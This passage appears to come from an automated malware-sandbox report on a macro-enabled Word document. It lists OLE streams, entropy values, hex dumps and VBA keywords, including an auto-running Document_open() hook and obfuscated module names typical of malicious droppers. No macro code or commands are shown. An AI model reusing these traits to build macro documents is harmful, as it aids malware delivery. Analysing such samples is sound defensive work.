                                          Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 53 8f 9c d6 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                          VBA Code Keywords

                                          Keyword
                                          Enpewjzyrpx
                                          False
                                          Private
                                          VB_Exposed
                                          Attribute
                                          VB_Creatable
                                          VB_Name
                                          Document_open()
                                          VB_PredeclaredId
                                          VB_GlobalNameSpace
                                          VB_Base
                                          VB_Customizable
                                          VB_TemplateDerived
                                          VBA Code
                                          VBA File Name: UserForm1, Stream Size: 1158
                                          General
                                          Stream Path:Macros/VBA/UserForm1
                                          VBA File Name:UserForm1
                                          Stream Size:1158
                                          Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 53 8f d3 a7 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                          VBA Code Keywords

                                          Keyword
                                          False
                                          VB_Exposed
                                          Attribute
                                          VB_Name
                                          VB_Creatable
                                          VB_PredeclaredId
                                          VB_GlobalNameSpace
                                          VB_Base
                                          VB_Customizable
                                          VB_TemplateDerived
                                          VBA Code
                                          VBA File Name: UserForm2, Stream Size: 1160
                                          General
                                          Stream Path:Macros/VBA/UserForm2
                                          VBA File Name:UserForm2
                                          Stream Size:1160
                                          Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 53 8f df ca 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                          VBA Code Keywords

                                          Keyword
                                          False
                                          VB_Exposed
                                          Attribute
                                          VB_Name
                                          VB_Creatable
                                          VB_PredeclaredId
                                          VB_GlobalNameSpace
                                          VB_Base
                                          VB_Customizable
                                          VB_TemplateDerived
                                          VBA Code
                                          VBA File Name: UserForm3, Stream Size: 1159
                                          General
                                          Stream Path:Macros/VBA/UserForm3
                                          VBA File Name:UserForm3
                                          Stream Size:1159
                                          Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . S . z + . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 53 8f 7a 2b 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                          VBA Code Keywords

                                          Keyword
                                          False
                                          VB_Exposed
                                          Attribute
                                          VB_Name
                                          VB_Creatable
                                          VB_PredeclaredId
                                          VB_Base
                                          VB_Customizable
                                          VB_TemplateDerived
                                          VB_GlobalNameSpace
                                          VBA Code
                                          VBA File Name: UserForm4, Stream Size: 1160
                                          General
                                          Stream Path:Macros/VBA/UserForm4
                                          VBA File Name:UserForm4
                                          Stream Size:1160
                                          Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . S . M x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 53 8f 4d 78 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                          VBA Code Keywords

                                          Keyword
                                          False
                                          VB_Exposed
                                          Attribute
                                          VB_Name
                                          VB_Creatable
                                          VB_Customizable
                                          VB_PredeclaredId
                                          VB_GlobalNameSpace
                                          VB_Base
                                          VB_TemplateDerived
                                          VBA Code
                                          VBA File Name: UserForm5, Stream Size: 1159
                                          General
                                          Stream Path:Macros/VBA/UserForm5
                                          VBA File Name:UserForm5
                                          Stream Size:1159
                                          Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . S . b X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 53 8f 62 58 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                          VBA Code Keywords

                                          Keyword
                                          False
                                          VB_Exposed
                                          Attribute
                                          VB_Name
                                          VB_Creatable
                                          VB_PredeclaredId
                                          VB_GlobalNameSpace
                                          VB_Base
                                          VB_Customizable
                                          VB_TemplateDerived
                                          VBA Code

                                          Streams

                                          Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                          General
                                          Stream Path:\x1CompObj
                                          File Type:data
                                          Stream Size:114
                                          Entropy:4.2359563651
                                          Base64 Encoded:True
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
                                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                          General
                                          Stream Path:\x5DocumentSummaryInformation
                                          File Type:data
                                          Stream Size:4096
                                          Entropy:0.252421588676
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 580
                                          General
                                          Stream Path:\x5SummaryInformation
                                          File Type:data
                                          Stream Size:580
                                          Entropy:4.21188275804
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . . \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 14 02 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 74 01 00 00 04 00 00 00 5c 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00
                                          Stream Path: 1Table, File Type: data, Stream Size: 7215
                                          General
                                          Stream Path:1Table
                                          File Type:data
                                          Stream Size:7215
                                          Entropy:5.85534358506
                                          Base64 Encoded:True
                                          Data ASCII:. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                          Data Raw:0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                          Stream Path: Data, File Type: data, Stream Size: 99187
                                          General
                                          Stream Path:Data
                                          File Type:data
                                          Stream Size:99187
                                          Entropy:7.38968888242
                                          Base64 Encoded:True
                                          Data ASCII:s . . . D . d . . . . . . . . . . . . . . . . . . . . . / g . , b . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . c . . . 8 . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . i . c . t . u . r . e . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . . . . . R . . . . . . . . . . . . h . D . 3 . . . V 8 . . . . . . . . . . . . . D . . . . . . . . F . . . . . . . . . h . D . 3 . . . V 8 . . . . . . . . .
                                          Data Raw:73 83 01 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 67 eb 2c 62 01 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 63 00 0b f0 38 00 00 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00 08 00 80 c3 14 00
                                          Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 903
                                          General
                                          Stream Path:Macros/PROJECT
                                          File Type:ASCII text, with CRLF line terminators
                                          Stream Size:903
                                          Entropy:5.32016542547
                                          Base64 Encoded:True
                                          Data ASCII:I D = " { A 1 A 8 2 5 2 F - 4 1 E D - 4 3 8 E - A 9 E 2 - 8 0 E 5 6 5 2 E E F 3 3 } " . . D o c u m e n t = R 4 b m 0 1 n s b t d t 1 / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = U s e r F o r m 1 . . B a s e C l a s s = U s e r F o r m 2 . . B a s e C l a s s = U s e r F o r m 3 . . B a s e C l a s s = U s e r F o r m 4 . . B a s e C l a s s = U s e r F o r m 5 . . M o d u l e = Q f e p b z t q 9 r 8 o 1 l 7 6
                                          Data Raw:49 44 3d 22 7b 41 31 41 38 32 35 32 46 2d 34 31 45 44 2d 34 33 38 45 2d 41 39 45 32 2d 38 30 45 35 36 35 32 45 45 46 33 33 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 52 34 62 6d 30 31 6e 73 62 74 64 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 0d 0a
                                          Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 284
                                          General
                                          Stream Path:Macros/PROJECTwm
                                          File Type:data
                                          Stream Size:284
                                          Entropy:3.71118828619
                                          Base64 Encoded:False
                                          Data ASCII:R 4 b m 0 1 n s b t d t 1 . R . 4 . b . m . 0 . 1 . n . s . b . t . d . t . 1 . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . U s e r F o r m 2 . U . s . e . r . F . o . r . m . 2 . . . U s e r F o r m 3 . U . s . e . r . F . o . r . m . 3 . . . U s e r F o r m 4 . U . s . e . r . F . o . r . m . 4 . . . U s e r F o r m 5 . U . s . e . r . F . o . r . m . 5 . . . Q f e p b z t q 9 r 8 o 1 l 7 6 . Q . f . e . p . b . z . t . q . 9 . r . 8 . o . 1 . l . 7 . 6 . . . L 6 b i h t d t n a s c .
                                          Data Raw:52 34 62 6d 30 31 6e 73 62 74 64 74 31 00 52 00 34 00 62 00 6d 00 30 00 31 00 6e 00 73 00 62 00 74 00 64 00 74 00 31 00 00 00 55 73 65 72 46 6f 72 6d 31 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 31 00 00 00 55 73 65 72 46 6f 72 6d 32 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 32 00 00 00 55 73 65 72 46 6f 72 6d 33 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00
                                          Stream Path: Macros/UserForm1/\x1CompObj, File Type: data, Stream Size: 97
                                          General
                                          Stream Path:Macros/UserForm1/\x1CompObj
                                          File Type:data
                                          Stream Size:97
                                          Entropy:3.61064918306
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                          Stream Path: Macros/UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                          General
                                          Stream Path:Macros/UserForm1/\x3VBFrame
                                          File Type:ASCII text, with CRLF line terminators
                                          Stream Size:266
                                          Entropy:4.62034133633
                                          Base64 Encoded:True
                                          Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                          Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                          Stream Path: Macros/UserForm1/f, File Type: data, Stream Size: 38
                                          General
                                          Stream Path:Macros/UserForm1/f
                                          File Type:data
                                          Stream Size:38
                                          Entropy:1.54052096453
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Stream Path: Macros/UserForm1/o, File Type: empty, Stream Size: 0
                                          General
                                          Stream Path:Macros/UserForm1/o
                                          File Type:empty
                                          Stream Size:0
                                          Entropy:0.0
                                          Base64 Encoded:False
                                          Data ASCII:
                                          Data Raw:
                                          Stream Path: Macros/UserForm2/\x1CompObj, File Type: data, Stream Size: 97
                                          General
                                          Stream Path:Macros/UserForm2/\x1CompObj
                                          File Type:data
                                          Stream Size:97
                                          Entropy:3.61064918306
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                          Stream Path: Macros/UserForm2/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                          General
                                          Stream Path:Macros/UserForm2/\x3VBFrame
                                          File Type:ASCII text, with CRLF line terminators
                                          Stream Size:266
                                          Entropy:4.62970308443
                                          Base64 Encoded:True
                                          Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 2 . . C a p t i o n = " U s e r F o r m 2 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                          Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 32 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 32 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                          Stream Path: Macros/UserForm2/f, File Type: data, Stream Size: 38
                                          General
                                          Stream Path:Macros/UserForm2/f
                                          File Type:data
                                          Stream Size:38
                                          Entropy:1.54052096453
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Stream Path: Macros/UserForm2/o, File Type: empty, Stream Size: 0
                                          General
                                          Stream Path:Macros/UserForm2/o
                                          File Type:empty
                                          Stream Size:0
                                          Entropy:0.0
                                          Base64 Encoded:False
                                          Data ASCII:
                                          Data Raw:
                                          Stream Path: Macros/UserForm3/\x1CompObj, File Type: data, Stream Size: 97
                                          General
                                          Stream Path:Macros/UserForm3/\x1CompObj
                                          File Type:data
                                          Stream Size:97
                                          Entropy:3.61064918306
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                          Stream Path: Macros/UserForm3/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                          General
                                          Stream Path:Macros/UserForm3/\x3VBFrame
                                          File Type:ASCII text, with CRLF line terminators
                                          Stream Size:266
                                          Entropy:4.63438395848
                                          Base64 Encoded:True
                                          Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 3 . . C a p t i o n = " U s e r F o r m 3 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                          Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 33 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 33 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                          Stream Path: Macros/UserForm3/f, File Type: data, Stream Size: 38
                                          General
                                          Stream Path:Macros/UserForm3/f
                                          File Type:data
                                          Stream Size:38
                                          Entropy:1.54052096453
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Stream Path: Macros/UserForm3/o, File Type: empty, Stream Size: 0
                                          General
                                          Stream Path:Macros/UserForm3/o
                                          File Type:empty
                                          Stream Size:0
                                          Entropy:0.0
                                          Base64 Encoded:False
                                          Data ASCII:
                                          Data Raw:
                                          Stream Path: Macros/UserForm4/\x1CompObj, File Type: data, Stream Size: 97
                                          General
                                          Stream Path:Macros/UserForm4/\x1CompObj
                                          File Type:data
                                          Stream Size:97
                                          Entropy:3.61064918306
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                          Stream Path: Macros/UserForm4/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                          General
                                          Stream Path:Macros/UserForm4/\x3VBFrame
                                          File Type:ASCII text, with CRLF line terminators
                                          Stream Size:266
                                          Entropy:4.62402723855
                                          Base64 Encoded:True
                                          Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 4 . . C a p t i o n = " U s e r F o r m 4 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                          Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 34 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 34 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                          Stream Path: Macros/UserForm4/f, File Type: data, Stream Size: 38
                                          General
                                          Stream Path:Macros/UserForm4/f
                                          File Type:data
                                          Stream Size:38
                                          Entropy:1.54052096453
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
